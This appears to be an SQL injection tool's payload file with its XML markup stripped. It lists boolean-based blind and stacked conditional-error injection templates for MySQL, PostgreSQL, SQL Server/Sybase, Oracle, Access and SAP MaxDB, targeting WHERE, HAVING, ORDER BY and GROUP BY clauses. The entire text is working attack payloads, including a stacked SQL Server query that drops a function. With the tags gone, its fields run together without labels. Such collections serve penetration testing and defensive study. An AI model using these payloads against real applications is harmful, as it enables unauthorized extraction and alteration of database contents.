AND boolean-based blind - WHERE or HAVING clause

AND boolean-based blind - WHERE or HAVING clause 1 1 1 1 1 AND [INFERENCE] AND [RANDNUM]=[RANDNUM] AND [RANDNUM]=[RANDNUM1] AND boolean-based blind - WHERE or HAVING clause (MySQL comment) 1 4 1 1 1 AND [INFERENCE] AND [RANDNUM]=[RANDNUM] # AND [RANDNUM]=[RANDNUM1]

MySQL

AND boolean-based blind - WHERE or HAVING clause (Generic comment) 1 4 1 1 1 AND [INFERENCE] AND [RANDNUM]=[RANDNUM] -- AND [RANDNUM]=[RANDNUM1] OR boolean-based blind - WHERE or HAVING clause 1 2 3 1 2 OR ([INFERENCE]) OR ([RANDNUM]=[RANDNUM]) OR ([RANDNUM]=[RANDNUM1]) OR boolean-based blind - WHERE or HAVING clause (MySQL comment) 1 3 3 1 2 OR ([INFERENCE]) OR ([RANDNUM]=[RANDNUM]) # OR ([RANDNUM]=[RANDNUM1])

MySQL

OR boolean-based blind - WHERE or HAVING clause (Generic comment) 1 3 3 1 2 OR ([INFERENCE]) OR ([RANDNUM]=[RANDNUM]) -- OR ([RANDNUM]=[RANDNUM1]) MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) 1 3 1 1,2,3 1 RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END)) RLIKE (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 0x28 END)) RLIKE (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 0x28 END))

MySQL

Generic boolean-based blind - Parameter replace (original value) 1 2 1 1,2,3 3 (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) MySQL boolean-based blind - Parameter replace (MAKE_SET - original value) 1 3 1 1,2,3 3 MAKE_SET([INFERENCE],[ORIGVALUE]) MAKE_SET([RANDNUM]=[RANDNUM],[ORIGVALUE]) MAKE_SET([RANDNUM]=[RANDNUM1],[ORIGVALUE])

MySQL

MySQL boolean-based blind - Parameter replace (ELT - original value) 1 4 1 1,2,3 3 ELT([INFERENCE],[ORIGVALUE]) ELT([RANDNUM]=[RANDNUM],[ORIGVALUE]) ELT([RANDNUM]=[RANDNUM1],[ORIGVALUE])

MySQL

MySQL boolean-based blind - Parameter replace (bool*int - original value) 1 4 1 1,2,3 3 ([INFERENCE])*[ORIGVALUE] ([RANDNUM]=[RANDNUM])*[ORIGVALUE] ([RANDNUM]=[RANDNUM1])*[ORIGVALUE]

MySQL

MySQL >= 5.0 boolean-based blind - Parameter replace (original value) 1 3 1 1,2,3 3 (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))

MySQL >= 5.0

MySQL < 5.0 boolean-based blind - Parameter replace (original value) 1 4 1 1,2,3 3 (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))

MySQL

PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES - original value) 1 3 2 1,2,3 3 (SELECT GENERATE_SERIES([ORIGVALUE],[ORIGVALUE],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1) (SELECT GENERATE_SERIES([ORIGVALUE],[ORIGVALUE],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1) (SELECT GENERATE_SERIES([ORIGVALUE],[ORIGVALUE],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1)

PostgreSQL

Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value) 1 3 1 1,3 3 (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))

Microsoft SQL Server Sybase Windows

Oracle boolean-based blind - Parameter replace (original value) 1 3 1 1,3 3 (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)

Oracle

Microsoft Access boolean-based blind - Parameter replace (original value) 1 3 1 1,3 3 IIF([INFERENCE],[ORIGVALUE],1/0) IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0) IIF([RANDNUM]=[RANDNUM1],[ORIGVALUE],1/0)

Microsoft Access

SAP MaxDB boolean-based blind - Parameter replace (original value) 1 3 1 1,3 3 (CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END) (CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END) (CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE NULL END)

SAP MaxDB

Generic boolean-based blind - GROUP BY and ORDER BY clauses 1 3 1 2,3 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE 1/(SELECT 0) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/(SELECT 0) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 1/(SELECT 0) END)) Generic boolean-based blind - GROUP BY and ORDER BY clauses (original value) 1 4 1 2,3 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses 1 3 1 2,3 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))

MySQL >= 5.0

MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses 1 4 1 2,3 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))

MySQL

Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause 1 3 1 3 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))

Microsoft SQL Server Sybase Windows

Oracle boolean-based blind - GROUP BY and ORDER BY clauses 1 3 1 2,3 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)

Oracle

Microsoft Access boolean-based blind - GROUP BY and ORDER BY clauses 1 3 1 2,3 1 ,IIF([INFERENCE],[ORIGVALUE],1/0) ,IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0) ,IIF([RANDNUM]=[RANDNUM1],[ORIGVALUE],1/0)

Microsoft Access

PostgreSQL stacked conditional-error blind queries 1 3 0 0 2 ; SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END) ; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END) -- ; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)

PostgreSQL

Microsoft SQL Server/Sybase stacked conditional-error blind queries 1 3 0 0 1 ; IF([INFERENCE]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR] ; IF([RANDNUM]=[RANDNUM]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR] -- ; IF([RANDNUM]=[RANDNUM1]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]

Microsoft SQL Server Sybase Windows